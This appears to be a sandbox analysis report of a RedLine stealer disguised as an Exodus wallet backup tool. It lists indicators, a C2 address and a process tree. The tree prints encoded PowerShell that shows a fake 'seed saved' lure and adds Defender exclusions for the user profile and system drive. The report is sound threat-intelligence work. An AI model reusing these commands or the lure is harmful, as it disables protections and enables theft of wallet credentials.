redline | 21b4e9035539bfd9e1d5887325fd5c671c113830035b347b0f1d002a7fa5ead6

Analysis

max time kernel
149s
max time network
155s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28-11-2024 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Exodus Backup.zip
Size

224.2MB
MD5

dbb7b2722726811d996ad2674ccd88dc
SHA1

b079fac5f4772d8eb549bf7f03e9c4af17e09245
SHA256

21b4e9035539bfd9e1d5887325fd5c671c113830035b347b0f1d002a7fa5ead6
SHA512

9ff8f75c98b1cfac4afe407be545d8f0d3eaedf8e9b171a46371f960e40eee6589ead09559e1c2da7cc1036241733b4cf96794da485eb5155af6311c535ccde6
SSDEEP

6291456:5pHqxhMpbUQPrvc7k9u6zz5vUFhC6nRn8fPbJShHH5vLsCDX:LHqxIbUQzvc7uu6H5vUFA6YQhHH5vLsi

Score

10^/10

redline exodus credential_access defense_evasion discovery infostealer spyware stealer

Malware Config

Extracted

Family

redline

Botnet

Exodus

85.117.241.171:1912

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/1540-42-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

Redline family
redline

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Export 12-word secret recovery phrase.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Exodus.exe

Executes dropped EXE 35 IoCs

pid	Process
1896	Export 12-word secret recovery phrase.exe
1224	PrWYC.exe
1540	PrWYC.exe
2628	exodus-windows-x64-24.41.2.exe
2660	Update.exe
1928	Squirrel.exe
3236	Exodus.exe
456	Update.exe
2684	Exodus.exe
2408	Exodus.exe
1440	Exodus.exe
3436	Exodus.exe
4256	Exodus.exe
1496	Exodus.exe
3744	Exodus.exe
3580	Exodus.exe
2616	Exodus.exe
468	Exodus.exe
1904	Exodus.exe
228	Exodus.exe
2072	Exodus.exe
3276	Exodus.exe
648	Exodus.exe
2124	Exodus.exe
5000	Exodus.exe
5356	Exodus.exe
5376	Exodus.exe
5388	Exodus.exe
3992	Update.exe
5384	Update.exe
4156	Squirrel.exe
4164	Exodus.exe
2208	Update.exe
2088	Exodus.exe
4572	Exodus.exe

Loads dropped DLL 39 IoCs

pid	Process
3236	Exodus.exe
2684	Exodus.exe
2408	Exodus.exe
2408	Exodus.exe
2408	Exodus.exe
2408	Exodus.exe
2408	Exodus.exe
1440	Exodus.exe
3436	Exodus.exe
4256	Exodus.exe
3436	Exodus.exe
3436	Exodus.exe
3436	Exodus.exe
3436	Exodus.exe
3744	Exodus.exe
3580	Exodus.exe
2616	Exodus.exe
3580	Exodus.exe
3580	Exodus.exe
3580	Exodus.exe
3580	Exodus.exe
468	Exodus.exe
1904	Exodus.exe
228	Exodus.exe
3276	Exodus.exe
2072	Exodus.exe
648	Exodus.exe
2124	Exodus.exe
5000	Exodus.exe
5356	Exodus.exe
5376	Exodus.exe
5388	Exodus.exe
4164	Exodus.exe
2088	Exodus.exe
4572	Exodus.exe
2088	Exodus.exe
2088	Exodus.exe
2088	Exodus.exe
2088	Exodus.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1224 set thread context of 1540	1224	PrWYC.exe	96

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	Exodus.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exodus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrWYC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Squirrel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Export 12-word secret recovery phrase.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrWYC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exodus-windows-x64-24.41.2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Squirrel.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Exodus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Exodus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Exodus.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Exodus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Exodus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Exodus.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Exodus.exe

Modifies registry class 12 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\shell	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\ = "URL:exodus"	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\shell\open\command	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\ = "URL:exodus"	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\shell\open\command	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\shell\open	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\exodus\\app-24.41.2\\Exodus.exe\" \"--\" \"%1\""	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\URL Protocol	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\exodus\\app-24.47.3\\Exodus.exe\" \"--\" \"%1\""	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\exodus\URL Protocol	Exodus.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
1816	powershell.exe
976	powershell.exe
976	powershell.exe
1816	powershell.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
2660	Update.exe
2660	Update.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
1220	7zFM.exe
5384	Update.exe
5384	Update.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1220	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1220	7zFM.exe
Token: 35	1220	7zFM.exe
Token: SeSecurityPrivilege	1220	7zFM.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeIncreaseQuotaPrivilege	1816	powershell.exe
Token: SeSecurityPrivilege	1816	powershell.exe
Token: SeTakeOwnershipPrivilege	1816	powershell.exe
Token: SeLoadDriverPrivilege	1816	powershell.exe
Token: SeSystemProfilePrivilege	1816	powershell.exe
Token: SeSystemtimePrivilege	1816	powershell.exe
Token: SeProfSingleProcessPrivilege	1816	powershell.exe
Token: SeIncBasePriorityPrivilege	1816	powershell.exe
Token: SeCreatePagefilePrivilege	1816	powershell.exe
Token: SeBackupPrivilege	1816	powershell.exe
Token: SeRestorePrivilege	1816	powershell.exe
Token: SeShutdownPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeSystemEnvironmentPrivilege	1816	powershell.exe
Token: SeRemoteShutdownPrivilege	1816	powershell.exe
Token: SeUndockPrivilege	1816	powershell.exe
Token: SeManageVolumePrivilege	1816	powershell.exe
Token: 33	1816	powershell.exe
Token: 34	1816	powershell.exe
Token: 35	1816	powershell.exe
Token: 36	1816	powershell.exe
Token: SeShutdownPrivilege	3236	Exodus.exe
Token: SeCreatePagefilePrivilege	3236	Exodus.exe
Token: SeShutdownPrivilege	3236	Exodus.exe
Token: SeCreatePagefilePrivilege	3236	Exodus.exe
Token: SeShutdownPrivilege	3236	Exodus.exe
Token: SeCreatePagefilePrivilege	3236	Exodus.exe
Token: SeDebugPrivilege	2660	Update.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	1440	Exodus.exe
Token: SeCreatePagefilePrivilege	1440	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe
Token: SeCreatePagefilePrivilege	3744	Exodus.exe
Token: SeShutdownPrivilege	3744	Exodus.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1220	7zFM.exe
1220	7zFM.exe
2660	Update.exe
3744	Exodus.exe
3744	Exodus.exe
3744	Exodus.exe
3744	Exodus.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1896	Export 12-word secret recovery phrase.exe
2628	exodus-windows-x64-24.41.2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1220 wrote to memory of 1896	1220	7zFM.exe	89
PID 1220 wrote to memory of 1896	1220	7zFM.exe	89
PID 1220 wrote to memory of 1896	1220	7zFM.exe	89
PID 1896 wrote to memory of 976	1896	Export 12-word secret recovery phrase.exe	91
PID 1896 wrote to memory of 976	1896	Export 12-word secret recovery phrase.exe	91
PID 1896 wrote to memory of 976	1896	Export 12-word secret recovery phrase.exe	91
PID 1896 wrote to memory of 1816	1896	Export 12-word secret recovery phrase.exe	92
PID 1896 wrote to memory of 1816	1896	Export 12-word secret recovery phrase.exe	92
PID 1896 wrote to memory of 1816	1896	Export 12-word secret recovery phrase.exe	92
PID 1896 wrote to memory of 1224	1896	Export 12-word secret recovery phrase.exe	95
PID 1896 wrote to memory of 1224	1896	Export 12-word secret recovery phrase.exe	95
PID 1896 wrote to memory of 1224	1896	Export 12-word secret recovery phrase.exe	95
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1224 wrote to memory of 1540	1224	PrWYC.exe	96
PID 1896 wrote to memory of 2628	1896	Export 12-word secret recovery phrase.exe	97
PID 1896 wrote to memory of 2628	1896	Export 12-word secret recovery phrase.exe	97
PID 1896 wrote to memory of 2628	1896	Export 12-word secret recovery phrase.exe	97
PID 2628 wrote to memory of 2660	2628	exodus-windows-x64-24.41.2.exe	99
PID 2628 wrote to memory of 2660	2628	exodus-windows-x64-24.41.2.exe	99
PID 2628 wrote to memory of 2660	2628	exodus-windows-x64-24.41.2.exe	99
PID 2660 wrote to memory of 1928	2660	Update.exe	100
PID 2660 wrote to memory of 1928	2660	Update.exe	100
PID 2660 wrote to memory of 1928	2660	Update.exe	100
PID 2660 wrote to memory of 3236	2660	Update.exe	101
PID 2660 wrote to memory of 3236	2660	Update.exe	101
PID 3236 wrote to memory of 456	3236	Exodus.exe	102
PID 3236 wrote to memory of 456	3236	Exodus.exe	102
PID 3236 wrote to memory of 456	3236	Exodus.exe	102
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103
PID 3236 wrote to memory of 2408	3236	Exodus.exe	103

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Exodus Backup.zip"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1220
- C:\Users\Admin\AppData\Local\Temp\7zO4C4758E7\Export 12-word secret recovery phrase.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO4C4758E7\Export 12-word secret recovery phrase.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAbgBiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBvAHUAcgAgAEcAZQBuAGUAcgBhAHQAZQBkACAAUwBlAGUAZAAgAHcAYQBzACAAcwB1AGMAZQBzAHMAZgB1AGwAeQAgAHMAYQB2AGUAZAAgAG8AbgAgAHkAbwB1AHIAIABEAGUAcwBrAHQAbwBwACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwB1AGoAawAjAD4A"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAdgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAbgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAegBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZAB6ACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- - C:\Users\Admin\AppData\Roaming\PrWYC.exe
    "C:\Users\Admin\AppData\Roaming\PrWYC.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Users\Admin\AppData\Roaming\PrWYC.exe
      "{path}"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1540
- - C:\Users\Admin\AppData\Roaming\exodus-windows-x64-24.41.2.exe
    "C:\Users\Admin\AppData\Roaming\exodus-windows-x64-24.41.2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
      "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2660
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Squirrel.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Squirrel.exe" --updateSelf=C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1928
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --squirrel-install 24.41.2
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3236
      - C:\Users\Admin\AppData\Local\exodus\Update.exe
        
        C:\Users\Admin\AppData\Local\exodus\Update.exe --createShortcut=Exodus.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:456
      - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,10785936017204440507,13878198466784166929,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1840 /prefetch:2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2408
      - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --field-trial-handle=2224,i,10785936017204440507,13878198466784166929,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2684
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --squirrel-firstrun
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
      - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,17884327323610728007,6407908798651438718,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1936 /prefetch:2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3436
      - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --field-trial-handle=2272,i,17884327323610728007,6407908798651438718,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:3
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4256

C:\Users\Admin\AppData\Local\exodus\Exodus.exe
"C:\Users\Admin\AppData\Local\exodus\Exodus.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1496
- C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
  "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3744
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2108,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3580
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
